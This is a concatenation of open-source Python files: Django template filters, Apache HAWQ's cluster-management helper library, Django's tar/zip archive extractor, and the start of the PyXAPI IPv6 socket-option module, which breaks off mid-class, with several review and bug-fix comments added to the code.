    # render content included gist
    content = re.sub(r'http(s)?:\/\/gist.github.com\/(\d+)(.js)?', r'<script src="http://gist.github.com/\2.js"></script>', content)
    # render sinaimg pictures
    content = re.sub(r'(http:\/\/\w+.sinaimg.cn\/.*?\.(jpg|gif|png))', r'<img src="\1" />', content)
    # render @ mention links
    content = re.sub(r'@(\w+)(\s|)', r'<a href="/u/\1/">@\1</a> ', content)
    # render youku videos
    content = re.sub(r'http://v.youku.com/v_show/id_(\w+).html', r'<iframe height=498 width=510 src="http://player.youku.com/embed/\1" frameborder=0 allowfullscreen style="width:100%;max-width:510px;"></iframe>', content)
    return content
@register.filter(name='markdown')
def markdown_up(content): # convert markdown source to HTML
    if not content:
        return ''
    # safe_mode='escape' escapes raw HTML in the input instead of passing it through.
    return markdown(content, extensions = ['codehilite', 'fenced_code', 'mathjax'], safe_mode = 'escape')
@register.filter(name='email_mosaic')
def email_mosaic(email): # partially mask an e-mail address for display
    if not email:
        return ''
    email_name = re.findall(r'^([^@]+)@', email)[0]
    if len(email_name) < 5:
        # Short local part: append *** after the name instead of hiding it.
        email_name = email_name + '***'
        # NOTE(review): email_name is used as a regex *replacement* string;
        # backslashes in it would be interpreted as escapes -- confirm inputs.
        email = re.sub(r'^([^@]+)@', '%s@' % email_name, email)
    else:
        # Longer local part: replace the 3 characters before '@' with ***.
        email = re.sub(r'[^@]{3}@', '***@', email)
    return email
@register.simple_tag
def gen_random(): # random cache-busting token appended to static-file URLs
    return random.random()
| mit |
huor/incubator-hawq | tools/bin/hawqpylib/hawqlib.py | 5 | 20926 | #!/usr/bin/env python
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os, sys
import subprocess
import threading
import Queue
from xml.dom import minidom
from xml.etree.ElementTree import ElementTree
from pygresql.pg import DatabaseError
import shutil
from gppylib.db import dbconn
from gppylib.commands.base import WorkerPool, REMOTE
from gppylib.commands.unix import Echo
import re
class HawqCommands(object):
    """Run a batch of callables concurrently, summing their integer results.

    Work items are dicts of the form {'func': callable, 'args': tuple_or_None};
    batch_result() returns the sum of all return codes (0 == all succeeded).
    """

    def __init__(self, function_list=None, name='HAWQ', action_name='execute', logger=None):
        self.function_list = function_list
        self.name = name
        self.action_name = action_name
        self.return_flag = 0
        self.thread_list = []
        # NOTE: the attribute is only created when a logger is supplied,
        # mirroring the original behavior.
        if logger:
            self.logger = logger

    def get_function_list(self, function_list):
        """Replace the list of work items."""
        self.function_list = function_list

    def exec_function(self, func, *args, **kwargs):
        """Invoke one work item and accumulate its return code."""
        rc = func(*args, **kwargs)
        if rc != 0 and self.logger and func.__name__ == 'remote_ssh':
            self.logger.error("%s %s failed on %s" % (self.name, self.action_name, args[1]))
        self.return_flag += rc

    def start(self):
        """Spawn one thread per work item and wait for all of them to finish."""
        self.thread_list = []
        self.return_flag = 0
        for item in self.function_list:
            if item["args"]:
                call_args = (item["func"],) + tuple(item["args"])
            else:
                call_args = (item["func"],)
            worker = threading.Thread(target=self.exec_function, args=call_args, name=self.name)
            self.thread_list.append(worker)
        for worker in self.thread_list:
            worker.start()
        for worker in self.thread_list:
            worker.join()

    def batch_result(self):
        """Sum of all collected return codes."""
        return self.return_flag
class threads_with_return(object):
    """Run work items concurrently and push each item's return value onto a queue.

    The caller supplies the queue via *return_values*; batch_result() hands it back.
    """

    def __init__(self, function_list=None, name='HAWQ', action_name='execute', logger=None, return_values=None):
        self.function_list = function_list
        self.name = name
        self.action_name = action_name
        self.return_values = return_values
        self.thread_list = []
        self.logger = logger

    def get_function_list(self, function_list):
        """Replace the list of {'func': ..., 'args': ...} work items."""
        self.function_list = function_list

    def exec_function(self, func, *args, **kwargs):
        """Invoke one work item, log ssh failures, and queue the result."""
        rc = func(*args, **kwargs)
        if rc != 0 and self.logger and func.__name__ == 'remote_ssh':
            self.logger.error("%s %s failed on %s" % (self.name, self.action_name, args[1]))
        self.return_values.put(rc)

    def start(self):
        """Spawn one thread per work item and wait for all of them."""
        self.thread_list = []
        for item in self.function_list:
            extra = tuple(item["args"]) if item["args"] else ()
            worker = threading.Thread(target=self.exec_function,
                                      args=(item["func"],) + extra,
                                      name=self.name)
            self.thread_list.append(worker)
        for worker in self.thread_list:
            worker.start()
        for worker in self.thread_list:
            worker.join()

    def batch_result(self):
        """Return the queue holding every work item's return value."""
        return self.return_values
def check_property_exist_xml(xml_file, property_name):
    """Look up *property_name* in a Hadoop-style XML configuration file.

    Returns a tuple (found, property_name, value).  When the property occurs
    more than once, the value of the last occurrence is reported.
    """
    found = False
    found_value = ''
    with open(xml_file) as f:
        doc = minidom.parse(f)
    for prop in doc.getElementsByTagName('property'):
        name = prop.getElementsByTagName('name')[0].childNodes[0].data
        value = prop.getElementsByTagName('value')[0].childNodes[0].data
        if name == property_name:
            found = True
            found_value = value
    return found, property_name, found_value
def get_xml_values(xmlfile):
    """Parse a Hadoop-style XML config file into a {name: value} dict.

    Names and values are ASCII-encoded; a property whose <value> element is
    empty maps to None.
    """
    with open(xmlfile) as f:
        doc = minidom.parse(f)
    result = {}
    for prop in doc.getElementsByTagName('property'):
        name = prop.getElementsByTagName('name')[0].childNodes[0].data.encode('ascii')
        try:
            value = prop.getElementsByTagName('value')[0].childNodes[0].data.encode('ascii')
        except:
            # Empty <value></value> has no child text node.
            value = None
        result[name] = value
    return result
class HawqXMLParser:
    """Reader for $GPHOME/etc/hawq-site.xml.

    get_value_from_name() looks up a single property; get_all_values() loads
    every property into self.hawq_dict.
    """

    def __init__(self, GPHOME):
        self.GPHOME = GPHOME
        self.xml_file = "%s/etc/hawq-site.xml" % GPHOME
        self.hawq_dict = {}
        self.propertyValue = ""

    def get_value_from_name(self, property_name):
        """Return the value of *property_name* ('' when absent or empty)."""
        with open(self.xml_file) as f:
            xmldoc = minidom.parse(f)
            for node in xmldoc.getElementsByTagName('property'):
                name = node.getElementsByTagName('name')[0].childNodes[0].data.encode('ascii')
                try:
                    value = node.getElementsByTagName('value')[0].childNodes[0].data.encode('ascii')
                except:
                    # Empty <value></value> has no child text node.
                    value = ''
                if name == property_name:
                    self.propertyValue = value
        return self.propertyValue

    def get_all_values(self):
        """Load every property into self.hawq_dict; empty values become 'None'.

        A standby host of none/localhost/'' means "no standby configured" and
        is dropped from the dict.
        """
        with open(self.xml_file) as f:
            xmldoc = minidom.parse(f)
            for node in xmldoc.getElementsByTagName('property'):
                name = node.getElementsByTagName('name')[0].childNodes[0].data.encode('ascii')
                try:
                    value = node.getElementsByTagName('value')[0].childNodes[0].data.encode('ascii')
                except:
                    value = ''
                if value == '':
                    # BUG FIX: was "value == 'None'" -- a no-op comparison where
                    # an assignment normalizing empty values was clearly intended.
                    value = 'None'
                self.hawq_dict[name] = value
        if 'hawq_standby_address_host' in self.hawq_dict:
            if self.hawq_dict['hawq_standby_address_host'].lower() in ['none', '', 'localhost']:
                del self.hawq_dict['hawq_standby_address_host']
        return None

    def get_xml_doc(self):
        """Return the parsed minidom document for the hawq-site file."""
        with open(self.xml_file) as f:
            xmldoc = minidom.parse(f)
        return xmldoc
def check_hostname_equal(remote_host, user = ""):
    """Return True when *remote_host* reports the same hostname as this node.

    Exits the process (with the remote return code) when the remote
    `hostname` command cannot be executed.
    """
    cmd = "hostname"
    # NOTE(review): the local return code/stderr are never checked, and the
    # second call below rebinds `stderr_remote`, discarding the local stderr.
    result_local, local_hostname, stderr_remote = local_ssh_output(cmd)
    result_remote, remote_hostname, stderr_remote = remote_ssh_output(cmd, remote_host, user)
    if result_remote != 0:
        print "Execute command '%s' failed with return code %d on %s." % (cmd, result_remote, remote_host)
        print "Either ssh connection fails or command exits with error. Details:"
        print stderr_remote
        print "For ssh connection issue, please make sure passwordless ssh is enabled or check remote host."
        sys.exit(result_remote)
    # Compare trimmed output so trailing newlines do not matter.
    if local_hostname.strip() == remote_hostname.strip():
        return True
    else:
        return False
def check_hawq_running(host, data_directory, port, user = '', logger = None):
    """Determine whether a HAWQ instance is running on *host*.

    Cross-checks the postmaster.pid file in *data_directory* against a live
    postgres process.  A pid file without a matching process is treated as
    stale: the pid file and the /tmp socket lock file are removed.
    Returns a (host, hawq_running) tuple.
    """
    hawq_running = True
    hawq_pid_file_path = data_directory + '/postmaster.pid'
    if check_file_exist(hawq_pid_file_path, host, logger):
        if not check_postgres_running(data_directory, user, host, logger):
            # Stale pid file: clean up the leftovers so a restart can succeed.
            if logger:
                logger.warning("Have a postmaster.pid file but no hawq process running")
            lockfile="/tmp/.s.PGSQL.%s" % port
            if logger:
                logger.info("Clearing hawq instance lock files and pid file")
            cmd = "rm -rf %s %s" % (lockfile, hawq_pid_file_path)
            remote_ssh(cmd, host, user)
            hawq_running = False
        else:
            hawq_running = True
    else:
        # No pid file: trust the process table.
        if check_postgres_running(data_directory, user, host, logger):
            if logger:
                logger.warning("postmaster.pid file does not exist, but hawq process is running.")
            hawq_running = True
        else:
            if logger:
                logger.warning("HAWQ process is not running on %s, skip" % host)
            hawq_running = False
    return host, hawq_running
def local_ssh(cmd, logger=None, warning=False):
    """Run *cmd* in a local shell, optionally forwarding its output to *logger*.

    stdout is logged at info level; stderr at error level, or warning level
    when *warning* is set.  Returns the command's exit status.
    """
    proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    out, err = proc.communicate()
    if logger:
        if out != '':
            logger.info(out.strip())
        if err != '':
            emit = logger.warn if warning else logger.error
            emit(err.strip())
    return proc.returncode
def local_ssh_output(cmd):
    """Run *cmd* in a local shell; return (returncode, stdout, stderr) as strings."""
    proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    out, err = proc.communicate()
    return (proc.returncode, str(out.strip()), str(err.strip()))
def remote_ssh(cmd, host, user):
    """Run *cmd* on *host* over ssh (as *user* when given); return its exit status.

    Returns a non-zero status when the ssh process cannot even be started.
    """
    if user == "":
        remote_cmd_str = "ssh -o StrictHostKeyChecking=no %s \"%s\"" % (host, cmd)
    else:
        remote_cmd_str = "ssh -o StrictHostKeyChecking=no %s@%s \"%s\"" % (user, host, cmd)
    # BUG FIX: 'result' used to be referenced after the except block without
    # ever being assigned when Popen failed, raising NameError; default to
    # failure instead.
    result = 1
    try:
        result = subprocess.Popen(remote_cmd_str, shell=True).wait()
    except subprocess.CalledProcessError:
        print("Execute shell command on %s failed" % host)
        pass
    return result
def remote_ssh_output(cmd, host, user):
    """Run *cmd* on *host* over ssh; return (returncode, stdout, stderr) as strings.

    Returns (1, '', '') when the ssh process cannot be started.
    """
    if user == "":
        remote_cmd_str = "ssh -o StrictHostKeyChecking=no %s \"%s\"" % (host, cmd)
    else:
        remote_cmd_str = "ssh -o StrictHostKeyChecking=no %s@%s \"%s\"" % (user, host, cmd)
    try:
        result = subprocess.Popen(remote_cmd_str, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        stdout, stderr = result.communicate()
    except Exception:
        # BUG FIX: the original fell through to the return statement with
        # 'result'/'stdout'/'stderr' unbound, raising NameError instead of
        # reporting the failure.
        print("Execute shell command on %s failed" % host)
        return (1, '', '')
    return (result.returncode, str(stdout.strip()), str(stderr.strip()))
def is_node_alive(host, user='', logger=None):
    """Return True when *host* answers a trivial ssh command, else False."""
    if remote_ssh('true', host, user) == 0:
        return True
    if logger:
        logger.info("node %s is not alive" % host)
    return False
def check_return_code(result, logger=None, error_msg=None, info_msg=None, exit_true=False):
    """Check a shell exit code: exit(1) on failure, optionally exit(0) on success.

    Logs *error_msg* / *info_msg* when a logger is supplied.  Returns *result*
    (necessarily 0) when the process is allowed to continue.
    """
    if result == 0:
        if info_msg and logger:
            logger.info(info_msg)
        if exit_true:
            sys.exit(0)
        return result
    if error_msg and logger:
        logger.error(error_msg)
    sys.exit(1)
def check_postgres_running(data_directory, user, host='localhost', logger=None):
    """Return True when a postgres process serving *data_directory* runs on *host*."""
    cmd='ps -ef | grep postgres | grep %s | grep -v grep > /dev/null || exit 1;' % data_directory
    if remote_ssh(cmd, host, user) == 0:
        return True
    if logger:
        logger.debug("postgres process is not running on %s" % host)
    return False
def check_syncmaster_running(data_directory, user, host='localhost', logger=None):
    """Return True when a gpsyncmaster process serving *data_directory* runs on *host*."""
    cmd='ps -ef | grep gpsyncmaster | grep %s | grep -v grep > /dev/null || exit 1;' % data_directory
    if remote_ssh(cmd, host, user) == 0:
        return True
    if logger:
        logger.debug("syncmaster process is not running on %s" % host)
    return False
def check_file_exist(file_path, host='localhost', logger=None):
    """Return True when *file_path* exists as a regular file on *host*."""
    probe = "if [ -f %s ]; then exit 0; else exit 1;fi" % file_path
    if remote_ssh(probe, host, '') == 0:
        return True
    if logger:
        logger.debug("%s not exist on %s." % (file_path, host))
    return False
def check_file_exist_list(file_path, hostlist, user):
    """Return {host: 'exist'} for every host in *hostlist* where *file_path* is a file."""
    if user == "":
        user = os.getenv('USER')
    exist_map = {}
    for host in hostlist:
        if remote_ssh("test -f %s;" % file_path, host, user) == 0:
            exist_map[host] = 'exist'
    return exist_map
def check_directory_exist(directory_path, host, user):
    """Ensure *directory_path* exists on *host*, creating it when missing.

    Returns (host, True) when the remote command succeeded, (host, False)
    otherwise.
    """
    if user == "":
        user = os.getenv('USER')
    # BUG FIX: the command string was built twice -- the first copy was dead
    # code and the literal was duplicated inline; build it once and reuse it.
    cmd = "if [ ! -d %s ]; then mkdir -p %s; fi;" % (directory_path, directory_path)
    file_exist = remote_ssh(cmd, host, user) == 0
    return host, file_exist
def create_cluster_directory(directory_path, hostlist, user='', logger=None):
    """Create *directory_path* on every host in *hostlist* in parallel.

    Returns a pair (hosts_where_creation_succeeded, hosts_where_it_failed).
    """
    if user == "":
        user = os.getenv('USER')
    results = Queue.Queue()
    tasks = [{"func": check_directory_exist, "args": (directory_path, host, user)}
             for host in hostlist]
    runner = threads_with_return(name='HAWQ', action_name='create',
                                 logger=logger, return_values=results)
    runner.get_function_list(tasks)
    runner.start()
    succeeded, failed = [], []
    while not results.empty():
        host, created = results.get()
        if created:
            succeeded.append(host)
        else:
            failed.append(host)
    return succeeded, failed
def parse_hosts_file(GPHOME):
    """Read $GPHOME/etc/slaves and return the host names it lists.

    Blank lines are skipped and '#' starts a comment, either on its own line
    or trailing a host name.
    """
    host_file = "%s/etc/slaves" % GPHOME
    host_list = []
    with open(host_file) as f:
        for line in f:
            entry = line.split("#", 1)[0].strip()
            if entry:
                host_list.append(entry)
    return host_list
def update_xml_property(xmlfile, property_name, property_value):
    """Set *property_name* to *property_value* in a Hadoop-style XML file.

    The file is rewritten in place: everything up to and including the
    <configuration> line is copied verbatim, all properties are regenerated
    from the parsed document, and the property is appended when it was not
    already present.  A backup copy '.bak.<name>' is written first.
    """
    file_path, filename = os.path.split(xmlfile)
    xmlfile_backup = os.path.join(file_path, '.bak.' + filename)
    xmlfile_swap = os.path.join(file_path, '.swp.' + filename)
    # Backup current xmlfile
    shutil.copyfile(xmlfile, xmlfile_backup)
    f_tmp = open(xmlfile_swap, 'w')
    with open(xmlfile) as f:
        xmldoc = minidom.parse(f)
    with open(xmlfile) as f:
        # Copy the prolog verbatim, up to and including <configuration>.
        while 1:
            line = f.readline()
            if not line:
                break
            m = re.match('.*<configuration>.*', line)
            if m:
                line_1 = line.split('<configuration>')[0] + '<configuration>\n'
                f_tmp.write(line_1)
                break
            else:
                f_tmp.write(line)
    count_num = 0
    for node in xmldoc.getElementsByTagName('property'):
        name = node.getElementsByTagName('name')[0].childNodes[0].data.encode('ascii')
        try:
            value = node.getElementsByTagName('value')[0].childNodes[0].data.encode('ascii')
        except:
            value = ''
        try:
            description = node.getElementsByTagName('description')[0].childNodes[0].data.encode('ascii')
        except:
            description = ''
        if name == property_name:
            # Existing property: overwrite its value.
            value = property_value
            count_num += 1
        f_tmp.write(" <property>\n")
        f_tmp.write(" <name>%s</name>\n" % name)
        f_tmp.write(" <value>%s</value>\n" % value)
        if description:
            f_tmp.write(" <description>%s</description>\n" % description)
        f_tmp.write(" </property>\n\n")
    if count_num == 0:
        # Property was absent: append it as a new entry.
        f_tmp.write(" <property>\n")
        f_tmp.write(" <name>%s</name>\n" % property_name)
        f_tmp.write(" <value>%s</value>\n" % property_value)
        f_tmp.write(" </property>\n\n")
    f_tmp.write("</configuration>\n")
    # BUG FIX: was 'f_tmp.close' (an attribute access, never called), so the
    # swap file could be renamed while still open and unflushed.
    f_tmp.close()
    shutil.move(xmlfile_swap, xmlfile)
def remove_property_xml(property_name, xmlfile, quiet=False):
    """Delete *property_name* from a Hadoop-style XML file, keeping the rest.

    The prolog up to and including <configuration> is copied verbatim and the
    remaining properties are regenerated from the parsed document.  A backup
    copy '.bak.<name>' is written first.
    """
    file_path, filename = os.path.split(xmlfile)
    xmlfile_backup = os.path.join(file_path, '.bak.' + filename)
    xmlfile_swap = os.path.join(file_path, '.swp.' + filename)
    # Backup current xmlfile
    shutil.copyfile(xmlfile, xmlfile_backup)
    f_tmp = open(xmlfile_swap, 'w')
    with open(xmlfile) as f:
        xmldoc = minidom.parse(f)
    with open(xmlfile) as f:
        # Copy the prolog verbatim, up to and including <configuration>.
        while 1:
            line = f.readline()
            if not line:
                break
            m = re.match('.*<configuration>.*', line)
            if m:
                line_1 = line.split('<configuration>')[0] + '<configuration>\n'
                f_tmp.write(line_1)
                break
            else:
                f_tmp.write(line)
        for node in xmldoc.getElementsByTagName('property'):
            name = node.getElementsByTagName('name')[0].childNodes[0].data.encode('ascii')
            try:
                value = node.getElementsByTagName('value')[0].childNodes[0].data.encode('ascii')
            except:
                value = ''
            try:
                description = node.getElementsByTagName('description')[0].childNodes[0].data.encode('ascii')
            except:
                description = ''
            if name == property_name:
                # Matching property is simply not written back out.
                if not quiet:
                    # py2/py3-compatible print call (was a py2 print statement).
                    print("Remove property %s" % property_name)
            else:
                f_tmp.write(" <property>\n")
                f_tmp.write(" <name>%s</name>\n" % name)
                f_tmp.write(" <value>%s</value>\n" % value)
                if description:
                    f_tmp.write(" <description>%s</description>\n" % description)
                f_tmp.write(" </property>\n\n")
        f_tmp.write("</configuration>\n")
    # BUG FIX: was 'f_tmp.close' without parentheses -- the swap file was
    # never explicitly closed before the rename.
    f_tmp.close()
    shutil.move(xmlfile_swap, xmlfile)
def sync_hawq_site(GPHOME, host_list):
    """Copy $GPHOME/etc/hawq-site.xml to every host in *host_list* via scp.

    Exits the process when a copy fails.
    """
    for node in host_list:
        # BUG FIX: os.system() reports failure through its return value and
        # does not raise, so the old try/except could never detect a failed
        # scp; check the return code explicitly instead.
        rc = os.system("scp %s/etc/hawq-site.xml %s:%s/etc/hawq-site.xml > /dev/null 2>&1" % (GPHOME, node, GPHOME))
        if rc != 0:
            print("")
            sys.exit("sync to node %s failed." % node)
    return None
def get_hawq_hostname_all(master_port):
    """Query gp_segment_configuration and return the cluster topology.

    Returns {'master': {host: status}, 'standby': {host: status},
    'segment': {host: status, ...}}.  Requires the database to be up;
    exits the process otherwise.
    """
    try:
        dburl = dbconn.DbURL(port=master_port, dbname='template1')
        conn = dbconn.connect(dburl, True)
        query = "select role, status, port, hostname, address from gp_segment_configuration;"
        rows = dbconn.execSQL(conn, query)
        conn.close()
    except DatabaseError, ex:
        print "Failed to connect to database, this script can only be run when the database is up."
        sys.exit(1)
    seg_host_list = {}
    master_host = ''
    master_status = ''
    standby_host = ''
    standby_status = ''
    # Role codes in gp_segment_configuration: 'm' -> master, 's' -> standby,
    # 'p' -> (primary) segment.
    for row in rows:
        if row[0] == 'm':
            master_host = row[3]
            master_status = 'u'
        elif row[0] == 's':
            standby_host = row[3]
            if row[1] == "u":
                standby_status = "u"
            else:
                standby_status = "Unknown"
        elif row[0] == 'p':
            seg_host_list[row[3]] = row[1]
    hawq_host_array = {'master': {master_host: master_status}, 'standby': {standby_host: standby_status}, 'segment': seg_host_list}
    return hawq_host_array
def get_host_status(hostlist):
    """
    Test if SSH command works on a host and return a dictionary
    Return Ex: {host1: True, host2: False}
    where True represents SSH command success and False represents failure
    """
    if not isinstance(hostlist, list):
        raise Exception("Input parameter should be of type list")
    # Cap the worker pool at 16 concurrent ssh probes.
    pool = WorkerPool(min(len(hostlist), 16))
    for host in hostlist:
        pool.addCommand(Echo('ssh test', '', ctxt=REMOTE, remoteHost=host))
    pool.join()
    pool.haltWork()
    host_status_dict = {}
    for cmd in pool.getCompletedItems():
        host_status_dict[cmd.remoteHost] = cmd.get_results().wasSuccessful()
    return host_status_dict
def exclude_bad_hosts(host_list):
    """
    Split Hosts on which SSH works vs node on which it fails
    """
    status = get_host_status(host_list)
    working_hosts = [host for host in status.keys() if status[host]]
    bad_hosts = list(set(host_list) - set(working_hosts))
    return working_hosts, bad_hosts
| apache-2.0 |
gladsonvm/haystackdemo | lib/python2.7/site-packages/django/utils/archive.py | 78 | 6642 | """
Based on "python-archive" -- http://pypi.python.org/pypi/python-archive/
Copyright (c) 2010 Gary Wilson Jr. <gary.wilson@gmail.com> and contributers.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from __future__ import with_statement
import os
import shutil
import sys
import tarfile
import zipfile
class ArchiveException(Exception):
    """
    Base exception class for all archive errors.
    """
class UnrecognizedArchiveFormat(ArchiveException):
    """
    Error raised when passed file is not a recognized archive format.
    """
def extract(path, to_path=''):
    """
    Unpack the tar or zip file at the specified path to the directory
    specified by to_path.

    Raises UnrecognizedArchiveFormat when the path's extension is not a
    known archive format.
    """
    Archive(path).extract(to_path)
class Archive(object):
    """
    The external API class that encapsulates an archive implementation.
    """

    def __init__(self, file):
        self._archive = self._archive_cls(file)(file)

    @staticmethod
    def _archive_cls(file):
        """Pick the implementation class for *file* from its extension."""
        if isinstance(file, basestring):
            filename = file
        else:
            try:
                filename = file.name
            except AttributeError:
                raise UnrecognizedArchiveFormat(
                    "File object not a recognized archive format.")
        base, tail_ext = os.path.splitext(filename.lower())
        cls = extension_map.get(tail_ext)
        if cls is None:
            # Try the inner extension of doubled suffixes such as '.tar.gz'.
            base, ext = os.path.splitext(base)
            cls = extension_map.get(ext)
        if cls is None:
            raise UnrecognizedArchiveFormat(
                "Path not a recognized archive format: %s" % filename)
        return cls

    def extract(self, to_path=''):
        self._archive.extract(to_path)

    def list(self):
        self._archive.list()
class BaseArchive(object):
    """
    Base Archive class. Implementations should inherit this class.
    """

    def split_leading_dir(self, path):
        """Split off the first path component; returns (head, rest)."""
        path = str(path).lstrip('/').lstrip('\\')
        has_slash = '/' in path
        has_backslash = '\\' in path
        # Split on whichever separator occurs first.
        if has_slash and (not has_backslash or path.find('/') < path.find('\\')):
            return path.split('/', 1)
        if has_backslash:
            return path.split('\\', 1)
        return path, ''

    def has_leading_dir(self, paths):
        """
        Returns true if all the paths have the same leading path name
        (i.e., everything is in one subdirectory in an archive)
        """
        common = None
        for path in paths:
            prefix, _ = self.split_leading_dir(path)
            if not prefix:
                return False
            if common is None:
                common = prefix
            elif prefix != common:
                return False
        return True

    def extract(self):
        raise NotImplementedError

    def list(self):
        raise NotImplementedError
class TarArchive(BaseArchive):
    """Archive implementation backed by the tarfile module."""

    def __init__(self, file):
        self._archive = tarfile.open(file)

    def list(self, *args, **kwargs):
        self._archive.list(*args, **kwargs)

    def extract(self, to_path):
        """Extract members into *to_path*, stripping a common leading directory."""
        # note: python<=2.5 doesnt seem to know about pax headers, filter them
        members = [member for member in self._archive.getmembers()
                   if member.name != 'pax_global_header']
        # BUG FIX: has_leading_dir() compares path strings; it was being fed
        # TarInfo objects, so the leading-directory check never matched.
        leading = self.has_leading_dir(x.name for x in members)
        for member in members:
            name = member.name
            if leading:
                name = self.split_leading_dir(name)[1]
            filename = os.path.join(to_path, name)
            if member.isdir():
                if filename and not os.path.exists(filename):
                    os.makedirs(filename)
            else:
                # BUG FIX: 'extracted' must be bound before the try block; when
                # extractfile() raised, the finally clause below used to fail
                # with NameError instead of performing cleanup.
                extracted = None
                try:
                    extracted = self._archive.extractfile(member)
                except (KeyError, AttributeError):
                    # Some corrupt tar files seem to produce this
                    # (specifically bad symlinks)
                    print ("In the tar file %s the member %s is invalid: %s" %
                           (name, member.name, sys.exc_info()[1]))
                else:
                    dirname = os.path.dirname(filename)
                    if dirname and not os.path.exists(dirname):
                        os.makedirs(dirname)
                    with open(filename, 'wb') as outfile:
                        shutil.copyfileobj(extracted, outfile)
                finally:
                    if extracted:
                        extracted.close()
class ZipArchive(BaseArchive):
    """Archive implementation backed by the zipfile module."""

    def __init__(self, file):
        self._archive = zipfile.ZipFile(file)

    def list(self, *args, **kwargs):
        self._archive.printdir(*args, **kwargs)

    def extract(self, to_path):
        """Extract members into *to_path*, stripping a common leading directory."""
        namelist = self._archive.namelist()
        strip_leading = self.has_leading_dir(namelist)
        for name in namelist:
            data = self._archive.read(name)
            target = self.split_leading_dir(name)[1] if strip_leading else name
            filename = os.path.join(to_path, target)
            parent = os.path.dirname(filename)
            if parent and not os.path.exists(parent):
                os.makedirs(parent)
            if filename.endswith(('/', '\\')):
                # A directory entry
                if not os.path.exists(filename):
                    os.makedirs(filename)
            else:
                with open(filename, 'wb') as outfile:
                    outfile.write(data)
# Maps file extensions to their archive implementation class; consulted by
# Archive._archive_cls().
extension_map = {
    '.tar': TarArchive,
    '.tar.bz2': TarArchive,
    '.tar.gz': TarArchive,
    '.tgz': TarArchive,
    '.tz2': TarArchive,
    '.zip': ZipArchive,
}
| mit |
metricube/PyXAPI | rfc3542.py | 1 | 4574 | #!/usr/bin/env python
# rfc3542.py: front end for `_rfc3542.so'
# Copyright (C) 2004 Yves Legrandgerard (ylg@pps.jussieu.fr)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
from types import IntType, StringType
import struct
_have_rfc3542 = False
try:
import _rfc3542
from _rfc3542 import *
_have_rfc3542 = True
__doc__ = _rfc3542.__doc__
except ImportError:
pass
if _have_rfc3542:
    class SocketOptionInteger(object):
        """Internal helper: a socket option whose payload is a single integer.

        The integer is stored packed (struct format 'L') in `data`; `size`
        is the size in bytes of that packed value.
        NOTE(review): 'L' is the platform's *native* unsigned long (4 or 8
        bytes depending on the ABI) -- confirm this matches the option width
        the kernel expects.
        """
        def __init__(self):
            # `data` holds the packed option value; None until set() is called.
            self.data = None
            self.size = struct.calcsize('L')
        def set(self, i, bound, msg):
            # Validate type and range, then store the packed representation.
            if type(i) != IntType:
                raise TypeError, '%s.set: argument must be an integer' % \
                      self.__class__.__name__
            if not 0 <= i <= bound:
                # `error` comes from the _rfc3542 C extension via import *.
                raise error, msg % self.__class__.__name__
            self.data = struct.pack('L', i)
        def set_from_data(self, data):
            # Accept raw bytes only when they unpack as a single 'L' value.
            if type(data) != StringType:
                raise TypeError, \
                    '%s.set_from_data: argument must be a string' % \
                    self.__class__.__name__
            try:
                struct.unpack('L', data)[0]
            except:
                raise TypeError, '%s.set_from_data: invalid data' % \
                      self.__class__.__name__
            self.data = data
        def get(self):
            # Return the stored integer, or None when the option is unset.
            if self.data == None:
                return None
            return struct.unpack('L', self.data)[0]
    class hoplimit(SocketOptionInteger):
        """HOPLIMIT objects are defined to handle hoplimit option

    hoplimit() -> HOPLIMIT object

    Create a new HOPLIMIT object

    Methods of HOPLIMIT objects:

    set(string, int) -- initialize a hop limit option
    set_from_data(string) -- initialize a hop limit option from raw data
    get() -- return hop limit

    Attributes of HOPLIMIT objects:

    data -- HOPLIMIT object as a raw string
    size -- size in bytes of `hoplimit' option (not HOPLIMIT object)"""
        def __init__(self):
            SocketOptionInteger.__init__(self)
        def set(self, i):
            """set(int) -> None

    Initialize HOPLIMIT object. Arg1 is hop limit.
    Return None."""
            # Hop limit is an 8-bit field, hence the 0xff upper bound.
            SocketOptionInteger.set(self, i, 0xff, '%s: invalid hop limit')
        def set_from_data(self, data):
            """set_from_data(string) -> None

    Initialize HOPLIMIT object from raw data (arg1).
    Return None."""
            SocketOptionInteger.set_from_data(self, data)
        def get(self):
            """get() -> int

    Return hop limit."""
            return SocketOptionInteger.get(self)
    class tclass(SocketOptionInteger):
